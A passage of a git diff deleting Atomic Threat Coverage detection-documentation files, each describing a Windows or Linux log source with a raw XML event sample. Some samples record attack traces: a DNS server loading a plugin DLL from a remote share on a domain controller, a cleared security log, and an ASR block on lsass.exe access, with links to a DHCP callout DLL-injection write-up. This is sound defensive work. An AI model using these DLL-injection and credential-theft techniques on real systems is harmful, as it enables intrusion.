-  - <EventData Name="DNS_EVENT_PLUGIN_DLL_LOAD_OK">
-    <Data Name="param1">\\192.168.0.149\dll\wtf.dll</Data> 
-    <Data Name="param2">dc1.lab.internal</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0044_1000_application_crashed.md b/Atomic_Threat_Coverage/Data_Needed/DN0044_1000_application_crashed.md
deleted file mode 100644
index 6f5d07f..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0044_1000_application_crashed.md
+++ /dev/null
@@ -1,55 +0,0 @@
-| Title              | DN_0044_1000_application_crashed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This is a very generic error and it doesn't tell much about what caused it. Some applications may fail with this error when the system is left unstable by another faulty program. |
-| **Logging Policy** | <ul><li>[none](../Logging_Policies/none.md)</li></ul> |
-| **References**     | <ul><li>[https://www.morgantechspace.com/2014/12/event-id-1000-application-error.html](https://www.morgantechspace.com/2014/12/event-id-1000-application-error.html)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Application     |
-| **Provider**       | Application Error    |
-| **Fields**         | <ul><li>EventID</li><li>Hostname</li><li>Computer</li><li>FaultingApplicationName</li><li>FaultingModuleName</li><li>ExceptionCode</li><li>FaultOffset</li><li>FaultingProcessId</li><li>FaultingApplicationStartTime</li><li>FaultingApplicationPath</li><li>FaultingModulePath</li><li>ReportId</li><li>FaultingPackageFullName</li><li>FaultingPackage-relativeApplicationID</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System> 
-    <Provider Name="Application Error" /> 
-    <EventID Qualifiers="0">1000</EventID> 
-    <Level>2</Level> 
-    <Task>100</Task> 
-    <Keywords>0x80000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-01-01T15:49:38.973342200Z" /> 
-    <EventRecordID>6724</EventRecordID> 
-    <Channel>Application</Channel> 
-    <Computer>WD0000.eu.windows.com</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data>IntelAudioService.exe</Data> 
-    <Data>1.0.46.0</Data> 
-    <Data>59afa72c</Data> 
-    <Data>KERNELBASE.dll</Data> 
-    <Data>10.0.17134.441</Data> 
-    <Data>428de48c</Data> 
-    <Data>e06d7363</Data> 
-    <Data>000000000003a388</Data> 
-    <Data>1240</Data> 
-    <Data>01d49e823bbf0b3b</Data> 
-    <Data>C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe</Data> 
-    <Data>C:\WINDOWS\System32\KERNELBASE.dll</Data> 
-    <Data>6220b181-a7a0-4c44-9046-d8ce090d3a86</Data> 
-    <Data /> 
-    <Data />
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0045_1001_windows_error_reporting.md b/Atomic_Threat_Coverage/Data_Needed/DN0045_1001_windows_error_reporting.md
deleted file mode 100644
index d2b7bed..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0045_1001_windows_error_reporting.md
+++ /dev/null
@@ -1,62 +0,0 @@
-| Title              | DN_0045_1001_windows_error_reporting       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | When application fails, the result is recorded as an informational event in the Application log by Windows Error Reporting as event 1001. |
-| **Logging Policy** | <ul><li>[none](../Logging_Policies/none.md)</li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc754364(v=ws.11)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc754364(v=ws.11))</li><li>[https://social.technet.microsoft.com/wiki/contents/articles/3116.event-id-1001-windows-error-reporting.aspx?Sort=MostRecent&PageIndex=1](https://social.technet.microsoft.com/wiki/contents/articles/3116.event-id-1001-windows-error-reporting.aspx?Sort=MostRecent&PageIndex=1)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Application     |
-| **Provider**       | Windows Error Reporting    |
-| **Fields**         | <ul><li>EventID</li><li>Hostname</li><li>Computer</li><li>EventName</li><li>Response</li><li>CabId</li><li>ProblemSignature</li><li>AttachedFiles</li><li>Thesefilesmaybeavailablehere</li><li>AnalysisSymbol</li><li>RecheckingForSolution</li><li>ReportId</li><li>ReportStatus</li><li>HashedBucket</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Windows Error Reporting" /> 
-    <EventID Qualifiers="0">1001</EventID> 
-    <Level>4</Level> 
-    <Task>0</Task> 
-    <Keywords>0x80000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-01-08T14:01:18.909425000Z" /> 
-    <EventRecordID>11279</EventRecordID> 
-    <Channel>Application</Channel> 
-    <Computer>WD00000.eu.windows.com</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data>2005798148961969216</Data> 
-    <Data>5</Data> 
-    <Data>StoreAgentScanForUpdatesFailure0</Data> 
-    <Data>Not available</Data> 
-    <Data>0</Data> 
-    <Data>Update;</Data> 
-    <Data>8024402c</Data> 
-    <Data>16299</Data> 
-    <Data>847</Data> 
-    <Data>Windows.Desktop</Data> 
-    <Data /> 
-    <Data /> 
-    <Data /> 
-    <Data /> 
-    <Data /> 
-    <Data>\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER81F.tmp.WERInternalMetadata.xml</Data> 
-    <Data>C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_ba86f388d190af6963dbd95b33715448fcb6fd5_00000000_27442451</Data> 
-    <Data /> 
-    <Data>0</Data> 
-    <Data>0885fc8a-5383-4c50-b209-7c570832b8bf</Data> 
-    <Data>268435556</Data> 
-    <Data>e7b725b96c0bab97abd606ca1003a440</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0046_1031_dhcp_service_callout_dll_file_has_caused_an_exception.md b/Atomic_Threat_Coverage/Data_Needed/DN0046_1031_dhcp_service_callout_dll_file_has_caused_an_exception.md
deleted file mode 100644
index 49ae165..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0046_1031_dhcp_service_callout_dll_file_has_caused_an_exception.md
+++ /dev/null
@@ -1,45 +0,0 @@
-| Title              | DN0046_1031_dhcp_service_callout_dll_file_has_caused_an_exception       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The installed server callout .dll file has caused an exception |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc726937(v%3dws.10)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc726937(v%3dws.10))</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | System     |
-| **Provider**       | Microsoft-Windows-DHCP-Server    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-DHCP-Server" Guid="{6D64F02C-A125-4DAC-9A01-F0555B41CA84}" EventSourceName="DhcpServer" /> 
-    <EventID Qualifiers="0">1031</EventID> 
-    <Version>0</Version> 
-    <Level>3</Level> 
-    <Task>0</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x80000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-11T15:48:53.000000000Z" /> 
-    <EventRecordID>551</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="0" ThreadID="0" /> 
-    <Channel>System</Channel> 
-    <Computer>atc-win-2k12</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data>%Exception details%</Data> 
-    <Binary>7E000000</Binary> 
-  </EventData>
-</Event>
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0047_1032_dhcp_service_callout_dll_file_has_caused_an_exception.md b/Atomic_Threat_Coverage/Data_Needed/DN0047_1032_dhcp_service_callout_dll_file_has_caused_an_exception.md
deleted file mode 100644
index f588735..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0047_1032_dhcp_service_callout_dll_file_has_caused_an_exception.md
+++ /dev/null
@@ -1,45 +0,0 @@
-| Title              | DN0047_1032_dhcp_service_callout_dll_file_has_caused_an_exception       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The installed server callout .dll file has caused an exception |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc726937(v%3dws.10)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc726937(v%3dws.10))</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | System     |
-| **Provider**       | Microsoft-Windows-DHCP-Server    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-DHCP-Server" Guid="{6D64F02C-A125-4DAC-9A01-F0555B41CA84}" EventSourceName="DhcpServer" /> 
-    <EventID Qualifiers="0">1032</EventID> 
-    <Version>0</Version> 
-    <Level>3</Level> 
-    <Task>0</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x80000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-11T15:48:53.000000000Z" /> 
-    <EventRecordID>551</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="0" ThreadID="0" /> 
-    <Channel>System</Channel> 
-    <Computer>atc-win-2k12</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data>%Exception details%</Data> 
-    <Binary>7E000000</Binary> 
-  </EventData>
-</Event>
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0048_1033_dhcp_service_successfully_loaded_callout_dlls.md b/Atomic_Threat_Coverage/Data_Needed/DN0048_1033_dhcp_service_successfully_loaded_callout_dlls.md
deleted file mode 100644
index da8352d..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0048_1033_dhcp_service_successfully_loaded_callout_dlls.md
+++ /dev/null
@@ -1,46 +0,0 @@
-| Title              | DN0048_1033_dhcp_service_successfully_loaded_callout_dlls       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The DHCP service has successfully loaded one or more callout DLLs |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc726937(v%3dws.10)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc726937(v%3dws.10))</li><li>[https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html](https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | System     |
-| **Provider**       | Microsoft-Windows-DHCP-Server    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-DHCP-Server" Guid="{6D64F02C-A125-4DAC-9A01-F0555B41CA84}" EventSourceName="DhcpServer" />
-    <EventID Qualifiers="0">1033</EventID>
-    <Version>0</Version>
-    <Level>4</Level>
-    <Task>0</Task>
-    <Opcode>0</Opcode>
-    <Keywords>0x80000000000000</Keywords>
-    <TimeCreated SystemTime="2017-05-10T16:46:59.000000000Z" />
-    EventRecordID>6653</EventRecordID>
-    <Correlation />
-    <Execution ProcessID="0" ThreadID="0" />
-    <Channel>System</Channel>
-    <Computer>dc1.lab.internal</Computer>
-  <Security />
-  </System>
-  - <EventData>
-    <Data>Der Vorgang wurde erfolgreich beendet.</Data>
-    <Binary>00000000</Binary>
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0049_1034_dhcp_service_failed_to_load_callout_dlls.md b/Atomic_Threat_Coverage/Data_Needed/DN0049_1034_dhcp_service_failed_to_load_callout_dlls.md
deleted file mode 100644
index 541dc78..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0049_1034_dhcp_service_failed_to_load_callout_dlls.md
+++ /dev/null
@@ -1,45 +0,0 @@
-| Title              | DN0049_1034_dhcp_service_failed_to_load_callout_dlls       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The DHCP service has failed to load one or more callout DLLs |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc774858(v=ws.10)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc774858(v=ws.10))</li><li>[https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html](https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | System     |
-| **Provider**       | Microsoft-Windows-DHCP-Server    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-DHCP-Server" Guid="{6D64F02C-A125-4DAC-9A01-F0555B41CA84}" EventSourceName="DhcpServer" /> 
-    <EventID Qualifiers="0">1034</EventID> 
-    <Version>0</Version> 
-    <Level>3</Level> 
-    <Task>0</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x80000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-11T15:48:53.000000000Z" /> 
-    <EventRecordID>551</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="0" ThreadID="0" /> 
-    <Channel>System</Channel> 
-    <Computer>atc-win-2k12</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data>The specified module could not be found.</Data> 
-    <Binary>7E000000</Binary> 
-  </EventData>
-</Event>
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0050_1102_audit_log_was_cleared.md b/Atomic_Threat_Coverage/Data_Needed/DN0050_1102_audit_log_was_cleared.md
deleted file mode 100644
index 5358e7d..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0050_1102_audit_log_was_cleared.md
+++ /dev/null
@@ -1,50 +0,0 @@
-| Title              | DN0050_1102_audit_log_was_cleared       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Event 1102 is created whenever the Security log is cleared,  REGARDLESS of the status of the Audit System Events audit policy |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md)</li><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Eventlog    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Eventlog" Guid="{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" /> 
-    <EventID>1102</EventID> 
-    <Version>0</Version> 
-    <Level>4</Level> 
-    <Task>104</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x4020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-10-16T00:39:58.656871200Z" /> 
-    <EventRecordID>1087729</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="820" ThreadID="2644" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <UserData>
-    - <LogFileCleared xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog">
-      <SubjectUserSid>S-1-5-21-3457937927-2839227994-823803824-1104</SubjectUserSid> 
-      <SubjectUserName>dadmin</SubjectUserName> 
-      <SubjectDomainName>CONTOSO</SubjectDomainName> 
-      <SubjectLogonId>0x55cd1d</SubjectLogonId> 
-    </LogFileCleared>
-  </UserData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0051_1121_attack_surface_reduction_blocking_mode_event.md b/Atomic_Threat_Coverage/Data_Needed/DN0051_1121_attack_surface_reduction_blocking_mode_event.md
deleted file mode 100644
index d646eea..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0051_1121_attack_surface_reduction_blocking_mode_event.md
+++ /dev/null
@@ -1,55 +0,0 @@
-| Title              | DN0051_1121_attack_surface_reduction_blocking_mode_event       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Event generated when an attack surface reduction rule fires in block mode |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **Mitigation Policy** |<ul><li>[MP_0001_windows_asr_block_credential_stealing_from_lsass](../Mitigation_Policies/MP_0001_windows_asr_block_credential_stealing_from_lsass.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/d0a832b119a518a2c6b5f19ffd9dc44f0328c9a6/windows/security/threat-protection/windows-defender-exploit-guard/evaluate-attack-surface-reduction.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/d0a832b119a518a2c6b5f19ffd9dc44f0328c9a6/windows/security/threat-protection/windows-defender-exploit-guard/evaluate-attack-surface-reduction.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Windows Defender/Operational     |
-| **Provider**       | Microsoft-Windows-Windows Defender    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>ProductName</li><li>ProductVersion</li><li>Unused</li><li>RuleID</li><li>ASR_RuleID</li><li>DetectionTime</li><li>User</li><li>Path</li><li>ProcessName</li><li>SecurityintelligenceVersion</li><li>EngineVersion</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Windows Defender" Guid="{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}" /> 
-    <EventID>1121</EventID> 
-    <Version>0</Version> 
-    <Level>3</Level> 
-    <Task>0</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-29T12:13:55.890328700Z" /> 
-    <EventRecordID>66</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="2896" ThreadID="6928" /> 
-    <Channel>Microsoft-Windows-Windows Defender/Operational</Channel> 
-    <Computer>ATC-WIN-10</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="Product Name">%%827</Data> 
-    <Data Name="Product Version">4.18.1907.4</Data> 
-    <Data Name="Unused" /> 
-    <Data Name="ID">9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2</Data> 
-    <Data Name="Detection Time">2019-07-29T12:13:55.890Z</Data> 
-    <Data Name="User">ATC-WIN-10\yugoslavskiy</Data> 
-    <Data Name="Path">C:\Windows\System32\lsass.exe</Data> 
-    <Data Name="Process Name">C:\Program Files (x86)\GUM7534.tmp\GoogleUpdate.exe</Data> 
-    <Data Name="Security intelligence Version">1.299.756.0</Data> 
-    <Data Name="Engine Version">1.1.16200.1</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0052_2003_query_to_load_usb_drivers.md b/Atomic_Threat_Coverage/Data_Needed/DN0052_2003_query_to_load_usb_drivers.md
deleted file mode 100644
index 5f924c7..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0052_2003_query_to_load_usb_drivers.md
+++ /dev/null
@@ -1,46 +0,0 @@
-| Title              | DN0052_2003_query_to_load_usb_drivers       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Host Process has been asked to load drivers for USB device |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/](https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-DriverFrameworks-UserMode/Operational     |
-| **Provider**       | Microsoft-Windows-DriverFrameworks-UserMode    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>UMDFHostDeviceArrivalBegin</li><li>lifetime</li><li>instance</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-DriverFrameworks-UserMode" Guid="{2E35AAEB-857F-4BEB-A418-2E6C0E54D988}" />
-    <EventID>2003</EventID>
-    <Version>1</Version>
-    <Level>4</Level>
-    <Task>33</Task>
-    <Opcode>1</Opcode>
-    <Keywords>0x8000000000000000</Keywords>
-    <TimeCreated SystemTime="2017-07-22T21:01:03.421562800Z" />
-    <EventRecordID>65</EventRecordID>
-    <Correlation />
-    <Execution ProcessID="5420" ThreadID="4108" />
-    <Channel>Microsoft-Windows-DriverFrameworks-UserMode/Operational</Channel>
-    <Computer>ALPHA</Computer>
-    <Security UserID="S-1-5-19" />
-  </System>
-    - <UserData>
-      - <UMDFHostDeviceArrivalBegin instance="SWD\WPDBUSENUM\_??_USBSTOR#DISK&amp;VEN_LEXAR&amp;PROD_DIGITAL_FILM&amp;REV_#W1.#______________0302080000002D74AE7900000000000&amp;0#{53F56307-B6BF-11D0-94F2-00A0C91EFB8B}" lifetime="{5B5CB3FD-BDA8-42E0-8DCD-50A1FD1FA199}" xmlns="http://www.microsoft.com/DriverFrameworks/UserMode/Event">
-      </UMDFHostDeviceArrivalBegin>
-    </UserData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0053_2100_pnp_or_power_operation_for_usb_device.md b/Atomic_Threat_Coverage/Data_Needed/DN0053_2100_pnp_or_power_operation_for_usb_device.md
deleted file mode 100644
index 1f7433c..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0053_2100_pnp_or_power_operation_for_usb_device.md
+++ /dev/null
@@ -1,53 +0,0 @@
-| Title              | DN0053_2100_pnp_or_power_operation_for_usb_device       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Received a Pnp or Power operation for USB device |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/](https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-DriverFrameworks-UserMode/Operational     |
-| **Provider**       | Microsoft-Windows-DriverFrameworks-UserMode    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>UMDFHostDeviceRequest</li><li>lifetime</li><li>instance</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-DriverFrameworks-UserMode" Guid="{2E35AAEB-857F-4BEB-A418-2E6C0E54D988}" />
-    <EventID>2100</EventID>
-    <Version>1</Version>
-    <Level>4</Level>
-    <Task>37</Task>
-    <Opcode>1</Opcode>
-    <Keywords>0x8000000000000000</Keywords>
-    <TimeCreated SystemTime="2017-07-08T19:59:02.925841500Z" />
-    <EventRecordID>240</EventRecordID>
-    <Correlation />
-    <Execution ProcessID="2012" ThreadID="2496" />
-    <Channel>Microsoft-Windows-DriverFrameworks-UserMode/Operational</Channel>
-    <Computer>DavidClient</Computer>
-    <Security UserID="S-1-5-19" />
-  </System>
-    - <UserData>
-      - <UMDFHostDeviceRequest instance="SWD\WPDBUSENUM\{72D37FD9-05B1-11E6-8253-001A7DDA7113}#0000000000007E00" lifetime="{9A4B17EA-9EC2-4A46-BE0B-480915F9A030}" xmlns="http://www.microsoft.com/DriverFrameworks/UserMode/Event">
-        - <Request major="22" minor="2">
-          <Argument>0x51100</Argument>
-          <Argument>0x200000001</Argument>
-          <Argument>0x0</Argument>
-          <Argument>0x0</Argument>
-        </Request>
-      <Status>3221225659</Status>
-      </UMDFHostDeviceRequest>
-    </UserData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0054_2102_pnp_or_power_operation_for_usb_device.md b/Atomic_Threat_Coverage/Data_Needed/DN0054_2102_pnp_or_power_operation_for_usb_device.md
deleted file mode 100644
index 722dec1..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0054_2102_pnp_or_power_operation_for_usb_device.md
+++ /dev/null
@@ -1,53 +0,0 @@
-| Title              | DN0054_2102_pnp_or_power_operation_for_usb_device       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Finished PnP or Power operation for USB device |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/](https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-DriverFrameworks-UserMode/Operational     |
-| **Provider**       | Microsoft-Windows-DriverFrameworks-UserMode    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>UMDFHostDeviceRequest</li><li>lifetime</li><li>instance</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"> 
-  - <System> 
-    <Provider Name="Microsoft-Windows-DriverFrameworks-UserMode" Guid="{2e35aaeb-857f-4beb-a418-2e6c0e54d988}" /> 
-    <EventID>2102</EventID> 
-    <Version>1</Version> 
-    <Level>4</Level> 
-    <Task>37</Task> 
-    <Opcode>2</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2010-08-26T17:53:04.155Z" /> 
-    <EventRecordID>201772</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="3176" ThreadID="3236" /> 
-    <Channel>Microsoft-Windows-DriverFrameworks-UserMode/Operational</Channel> 
-    <Computer>Sal</Computer> 
-    <Security UserID="S-1-5-19" /> 
-  </System> 
-    - <UserData> 
-      - <UMDFHostDeviceRequest lifetime="{0A5BFD5B-1FC3-4985-9A2B-955F2D65E42F}" instance="WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#1&19F7E59C&0&_??_USBSTOR#DISK&VEN_GENERIC&PROD_USB_MS_READER&REV_1.03#920321111113&3#" xmlns:auto-ns2="http://schemas.microsoft.com/win/2004/08/events" xmlns="http://www.microsoft.com/DriverFrameworks/UserMode/Event"> 
-        - <Request major="22" minor="3"> 
-          <Argument>0x0</Argument> 
-          <Argument>0x6</Argument> 
-          <Argument>0x6</Argument> 
-          <Argument>0x0</Argument> 
-        </Request> 
-        <Status>3221225659</Status> 
-      </UMDFHostDeviceRequest> 
-    </UserData> 
-</Event> 
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0054_linux_auditd_execve.md b/Atomic_Threat_Coverage/Data_Needed/DN0054_linux_auditd_execve.md
deleted file mode 100644
index c47b4d1..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0054_linux_auditd_execve.md
+++ /dev/null
@@ -1,24 +0,0 @@
-| Title              | DN0054_linux_auditd_execve       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Linux auditd log of process (binary) execution (execeve syscall) with command line arguments |
-| **Logging Policy** | <ul><li>[LP0031_linux_auditd_execve](../Logging_Policies/LP0031_linux_auditd_execve.md)</li></ul> |
